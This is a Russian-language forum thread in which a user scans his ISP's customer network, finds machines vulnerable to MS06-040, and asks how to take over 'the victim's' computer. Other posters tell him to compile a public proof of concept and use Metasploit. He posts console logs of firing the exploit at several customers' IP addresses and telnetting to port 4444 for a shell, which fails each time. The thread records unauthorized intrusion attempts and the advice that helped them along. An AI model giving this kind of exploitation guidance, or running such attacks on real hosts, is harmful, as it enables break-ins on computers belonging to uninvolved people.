Решил просканировать сеть своего провайдера (Domolink) и нашёл одну уязвимость у большого количества пользователей, уязвимость ms06-040. Сканирую я программой XSpider. Прошу вас объяснить как с помощью этой уязвимости можно получить доступ к компьютеру жертвы, зарание большое спасибо и плбсы с меня . ```````````````````````````````````` Краткое описание: Уязвимости позволяют удаленному атакующему выполнить произвольный код с системными привилегиями. Подробное описание: В службе Server присутствует уязвимость переполнения буфера. Удаленный атакующий с помощью специальным образом сформированного запроса может вызвать отказ в обслуживании или выполнить произвольный код с системными привилегиями и получить полный контроль над системой. Уязвимые версии: Microsoft Windows 2000 Service Pack 4 Microsoft Windows XP Service Pack 1 Microsoft Windows XP Service Pack 2 Microsoft Windows Server 2003 Microsoft Windows Server 2003 Service Pack 1 ````````````````````````````````````
А там юзверь скинул ссылку на страницу http://www.securitylab.ru/poc/extra/271817.php , что делать с кодом, то там написан?)
это РоС код, т.е. показательное эксплуатирование ))) запускаешь через metasploit =) PS Хня на постном масле :Р
Да я просто пробил по маске своего провайдера, других смотреть не тянуло, там мне кажется, что ничего от провайдера не зависит, всего на 4х компах пока нашёл)
Да, спасибо, но я не понимаю что с этим текстом делать) точнее по объяснению ртуть нужно пропустить текст через некий metasploit, это программа такая?
Деточка. это код с++ и сначала ЭТО надо скомпилировать. а уже потом пользовать так как написано в описании.
Народ, подскажите, вот кажется ломанул я комп, пишет: F:\>2.exe 10.130.140.51 2 [+] Connecting to 10.130.140.51 ... [+] Binding to RPC interface ... [+] Sending RPC request ... [+] Now check for shell on 10.130.140.51:4444 ! что дальше то? почему-то опять отображается мой диск для ввода(F)!, а ведь как я понимаю должен его (C) (как я понимаю по стандарту)?
Microsoft Windows XP [Версия 5.1.2600] (С) Корпорация Майкрософт, 1985-2001. F:\Documents and Settings\Илья>св \ "св" не является внутренней или внешней командой, исполняемой программой или пакетным файлом. F:\Documents and Settings\Илья>cd \ F:\>2.exe 10.130.145.7 2 [+] Connecting to 10.130.145.7 ... [+] Binding to RPC interface ... [+] Sending RPC request ... [+] Now check for shell on 10.130.145.7:4444 ! F:\>telnet 10.130.145.7 Подключение к 10.130.145.7...Не удалось открыть подключение к этому узлу, на пор т 23: Сбой подключения F:\>telnet 10.130.145.7 4444 Подключение к 10.130.145.7...Не удалось открыть подключение к этому узлу, на пор т 4444: Сбой подключения F:\>ping 10.130.145.7 Обмен пакетами с 10.130.145.7 по 32 байт: Ответ от 10.130.145.7: число байт=32 время=61мс TTL=127 Ответ от 10.130.145.7: число байт=32 время=61мс TTL=127 Ответ от 10.130.145.7: число байт=32 время=60мс TTL=127 Ответ от 10.130.145.7: число байт=32 время=58мс TTL=127 Статистика Ping для 10.130.145.7: Пакетов: отправлено = 4, получено = 4, потеряно = 0 (0% потерь), Приблизительное время приема-передачи в мс: Минимальное = 58мсек, Максимальное = 61 мсек, Среднее = 60 мсек F:\>2.exe 10.130.145.8 2 [+] Connecting to 10.130.145.8 ... [+] Binding to RPC interface ... [+] Sending RPC request ... [+] Now check for shell on 10.130.145.8:4444 ! F:\>telnet 10.130.145.8 4444 Подключение к 10.130.145.8...Не удалось открыть подключение к этому узлу, на пор т 4444: Сбой подключения F:\>2.exe 10.130.145.13 2 [+] Connecting to 10.130.145.13 ... [+] Binding to RPC interface ... [+] Sending RPC request ... [+] Now check for shell on 10.130.145.13:4444 ! F:\>telnet 10.130.145.13 4444 Подключение к 10.130.145.13...Не удалось открыть подключение к этому узлу, на по рт 4444: Сбой подключения F:\>telnet 10.130.145.13:4444 Подключение к 10.130.145.13:4444...Не удалось открыть подключение к этому узлу, на порт 23: Сбой подключения F:\>2.exe 10.130.145.39 2 [+] Connecting to 10.130.145.39 ... [+] Binding to RPC interface ... [+] Sending RPC request ... [+] Now check for shell on 10.130.145.39:4444 ! F:\>telnet 10.130.145.39 4444 Подключение к 10.130.145.39...Не удалось открыть подключение к этому узлу, на по рт 4444: Сбой подключения F:\>2.exe 10.130.145.51 2 [+] Connecting to 10.130.145.51 ... [+] Binding to RPC interface ... [+] Sending RPC request ... [+] Now check for shell on 10.130.145.51:4444 ! F:\>telnet 10.130.145.51 4444 Подключение к 10.130.145.51...Не удалось открыть подключение к этому узлу, на по рт 4444: Сбой подключения F:\>2.exe 10.130.145.58 2 [+] Connecting to 10.130.145.58 ... [+] Binding to RPC interface ... [+] Sending RPC request ... [+] Now check for shell on 10.130.145.58:4444 ! F:\>telnet 10.130.145.58 4444 Подключение к 10.130.145.58...Не удалось открыть подключение к этому узлу, на по рт 4444: Сбой подключения F:\> `````````````````````` Видимо уже не прёт эта бага... кто-как считает?
заюзай метасплоит там легче будет http://www.metasploit.com/framework/downloader/?id=framework-3.0.exe